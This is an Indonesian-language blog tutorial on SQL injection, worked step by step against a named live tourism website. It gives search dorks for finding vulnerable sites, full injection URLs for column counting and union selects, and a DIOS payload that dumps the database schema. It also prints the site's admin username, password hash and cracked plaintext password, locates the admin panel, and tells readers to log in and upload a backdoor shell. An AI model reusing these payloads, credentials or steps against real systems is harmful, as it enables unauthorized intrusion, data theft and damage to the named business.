Ad Unit (Iklan) BIG

Cara melakukan SQL injection.

Post a Comment

-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL injection
-
Lansung saja.
-Dork : inurl:".php?id=" "hotel" + "+91"
             inurl:".php?id=" "berita" + "+62"
-Shell backdoor bisa kalian download dimana saja
Live target?
http://arunatoursbali.com/


>pertama kita cari parameter dari website tersebut
Bisa kalian klik setiap page yang muncul di index
Atau bisa kalian dorking.
-Dorking parameter : site:lon-t.online ".php?

>jika sudah mendapatkan parameter nya,
http://arunatoursbali.com/details_product.php?id=3&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0

>mari kita pastikan website tersebut vuln atau tidak. Beri ' di bagian akhir angka
http://arunatoursbali.com/details_product.php?id=3'&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>terlihat, reredirect (di alihkan ke halaman error404) apakah itu tandanya vuln? Coba kita lanjutkan order by untuk memastikan bahwa itu 404 asli atau hanya tipuan admin saja :'D.

http://arunatoursbali.com/details_product.php?id=3'+order+by+1--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0



>kenapa tidak dialihkan ke halaman error404 lagi? Apakah ini yang dinamakan cinta? :'D
>lanjut kita cari batas column nya, follow me : 

http://arunatoursbali.com/details_product.php?id=3'+order+by+1--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+10--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+11--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+12--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+13--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> error

>okeh, kita mendapatkan error404 kembali di column 13.
>lanjut kita union select, karena kita mendapatkan error404 kembali di angka 13, berarti batas column hanya sampai 12.

http://arunatoursbali.com/details_product.php?id=3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>tidak muncul angka togel? Tenang kita tambahkan and 0 sesudah '

http://arunatoursbali.com/details_product.php?id=3'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>dan angka togel sudah muncul, mari kita manfaatkan angka² tersebut untuk memanggil semua hal yang ada di dalam database website tersebut :'D
>saya akan menggunakan Dios (dump in one shoot).
concat(0x3c63656e7465723e3c68313e5b2b5d20496e6a656374656420427920314b346c4c5f2a205b2b5d3c2f68313e3c62723e3c62723e,0x44415441424153453a3a,database(),0x3c62723e,0x555345523a3a,user(),0x3c62723e,0x56455253494f4e3a3a,version(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

>tempel Dios tersebut di angka togel


>user,database,version,dan semua table yang ada di mysql sudah terlihat.
>jika anda mencari username and password admin kalian search in new tab, lalu ketik password atau pass.
>kebetulan diwebsite tersebut kita mendapatkan table ADMIN dengan isi ADMIN_ID,USERNAME,PASSWORD,ID

>lanjut kita dump isi dari table ADMIN.

make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,username,password)),@)


>kenapa error404 lagi? Apakah tidak bisa di panggil? Tenang, kita panggil manual saja, tanpa dios.
Follow me

http://arunatoursbali.com/details_product.php?id=3'+and+0+union+select+1,concat(username,0x20,password),3,4,5,6,7,8,9,10,11,12+from+admin--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>username dan password sudah nongol, sekarang kita analysis lalu hash password tersebut.
Hash anaylzer : https://www.tunnelsup.com/hash-analyzer/

>kita mendapatkan
Hash type: MD5 or MD4
>lanjut hash, disini saya menggunakan hashes.com
Found:
882444d50337d5e0d7c285cc6beff267:manager@aruna

>username : manager
>password : manager@aruna

~
Sekarang mari kita cari admin login nya,
Disini saya kasih trik cara menemukan admin login tanpa scan².

>pertama kita pergi ke parameter tadi, dan klik open in new tab images yang ada di page parameter tersebut,
>lalu akses new tab tadi, dan cek url nya.


>apa itu? /manage/ ? Apa itu admin login nya? Mari kita lihat.


>yeay, kita menemukannya.
>sekarang tinggal login dan upload shell backdoor kalian masing².

Ok sekian dari saya.
Jika ada yang ingin di tanyakan silakan chat whatsapp saya.
Nomor? Cari sendiri dong kan hacker :'D

Bye...
Thanks
Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email